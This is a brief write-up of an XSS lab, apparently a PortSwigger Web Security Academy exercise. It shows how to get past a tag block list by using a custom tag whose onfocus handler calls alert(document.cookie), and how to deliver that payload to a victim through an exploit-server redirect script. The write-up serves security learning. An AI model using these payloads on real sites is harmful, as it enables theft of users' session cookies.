XSS-Lab-3
--> Here most of the tags are blocked. only custom tags are allowed so we have to use payloads with custom tags
With custom tag, we can use most of the events but in most of the events user have to do something to trigger the payload. But then i found that focus
is very easy to do and that's why i chosen focus payload
--> Also i found same payload for focus on this website :
which was like this :
%3Cxss+id%253dx+onfocus%253dalert(document.cookie)+tabindex%253d1%3E#x
--> Now goto exploit server
and now we will redirect the user to our payload and we can do this with location so let's use it but we have to write it between <script>
tags to run js in our response.
==> So i made this payload:
<script>
location =
"https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x";
</script>
After that click store
and then send to victim